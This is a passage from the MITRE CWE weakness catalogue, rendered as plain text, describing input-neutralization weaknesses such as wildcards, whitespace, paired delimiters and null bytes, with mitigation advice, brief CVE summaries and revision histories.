variable name delimiters when they are sent to a downstream component. - As data is parsed, an injected delimiter may cause the process to take unexpected actions that result in an attack. Example: "$" for an environment variable. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that variable name delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2005-0129 - "%" variable is expanded by wildcard function into disallowed commands. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0129 - - - CVE-2002-0770 - Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770 - - - - - Variable Name Delimiter - - - SFP24 - Tainted input to command - - - - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Variable Name Delimiter - Failure to Remove Variable Name Delimiter - Failure to Sanitize Variable Name Delimiter - Improper Sanitization of Variable Name Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component. - As data is parsed, an injected element may cause the process to take unexpected actions. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that wildcard or matching elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0433 - Bypass file restrictions using wildcard character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433 - - - CVE-2002-1010 - Bypass file restrictions using wildcard character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1010 - - - CVE-2001-0334 - Wildcards generate long string on expansion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334 - - - CVE-2004-1962 - SQL injection involving "/**/" sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1962 - - - - - Wildcard or Matching Element - - - SFP24 - Tainted input to command - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Wildcard or Matching Element - Failure to Remove Wildcard or Matching Element - Failure to Sanitize Wildcard or Matching Symbol - Improper Sanitization of Wildcards or Matching Symbols - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component. - This can include space, tab, etc. - - - - - - - - - White space - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that whitespace will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0637 - MIE. virus protection bypass with RFC violations involving extra whitespace, or missing whitespace. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637 - - - CVE-2004-0942 - CPU consumption with MIME headers containing lines with many space characters, probably due to algorithmic complexity (RESOURCE.AMP.ALG). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942 - - - CVE-2003-1015 - MIE. whitespace interpreted differently by mail clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1015 - - - - - SPEC.WHITESPACE - Whitespace - - - SFP24 - Tainted input to command - - - - Can overlap other separator characters or delimiters. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Whitespace - Failure to Remove Whitespace - Failure to Sanitize Whitespace - Improper Sanitization of Whitespace - - - - The software does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces. - - Paired delimiters might include: - - - < and > angle brackets - ( and ) parentheses - { and } braces - [ and ] square brackets - " " double quotes - ' ' single quotes - - - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that grouping elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-0956 - Crash via missing paired delimiter (open double-quote but no closing double-quote). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956 - - - CVE-2000-1165 - Crash via message without closing ">". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1165 - - - CVE-2005-2933 - Buffer overflow via mailbox name with an opening double quote but missing a closing double quote, causing a larger copy than expected. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933 - - - - - Grouping Element / Paired Delimiter - - - SFP24 - Tainted input to command - - - - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Grouping Element / Paired Delimiter - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component. - As data is parsed, an injected NUL character or null byte may cause the software to believe the input is terminated earlier than it actually is, or otherwise cause the input to be misinterpreted. This could then be used to inject potentially dangerous input that occurs after the null byte or otherwise bypass validation routines and other protection mechanisms. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that null characters or null bytes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2008-1284 - NUL byte in theme name causes directory traversal impact to be worse - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284 - - - CVE-2005-2008 - Source code disclosure using trailing null. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2008 - - - CVE-2005-3293 - Source code disclosure using trailing null. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293 - - - CVE-2005-2061 - Trailing null allows file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2061 - - - CVE-2002-1774 - Null character in MIME header allows detection bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1774 - - - CVE-2000-0149 - Web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0149 - - - CVE-2000-0671 - Web server earlier allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) in the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671 - - - CVE-2001-0738 - Logging system allows an attacker to cause a denial of service (hang) by causing null bytes to be placed in log messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0738 - - - CVE-2001-1140 - Web server allows source code for executable programs to be read via a null character (%00) at the end of a request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140 - - - CVE-2002-1031 - Protection mechanism for limiting file access can be bypassed using a null character (%00) at the end of the directory name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031 - - - CVE-2002-1025 - Application server allows remote attackers to read JSP source code via an encoded null byte in an HTTP GET request, which causes the server to send the .JSP file unparsed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025 - - - CVE-2003-0768 - XSS protection mechanism only checks for sequences with an alphabetical character following a (<), so a non-alphabetical or null character (%00) following a < may be processed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0768 - - - CVE-2004-0189 - Decoding function in proxy allows regular expression bypass in ACLs via URLs with null characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189 - - - CVE-2005-3153 - Null byte bypasses PHP regexp check (interaction error). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153 - - - CVE-2005-4155 - Null byte bypasses PHP regexp check (interaction error). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155 - - - - - Null Character / Null Byte - - - 28 - Null Byte Injection - - - SFP24 - Tainted input to command - - - - - - - - - - - This can be a factor in multiple interpretation errors, other interaction errors, filename equivalence, etc. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - Null Character / Null Byte - Failure to Remove Null Character / Null Byte - Failure to Sanitize Null Byte or NUL Character - - - - The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Common Special Element Manipulations - - - SFP24 - Tainted input to command - - - - The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE. - Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation. - Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Maintenance_Notes, Other_Notes, Terminology_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Common Special Element Manipulations - Failure to Sanitize Special Element - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled leading special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Leading Special Element - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Leading Special Element - Failure to Sanitize Leading Special Element - Improper Sanitization of Leading Special Elements - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled multiple leading special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that multiple leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Multiple Leading Special Elements - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Multiple Leading Special Elements - Failure to Sanitize Multiple Leading Special Elements - Improper Sanitization of Multiple Leading Special Elements - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component. - As data is parsed, improperly handled trailing special elements may cause the process to take unexpected actions that result in an attack. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on 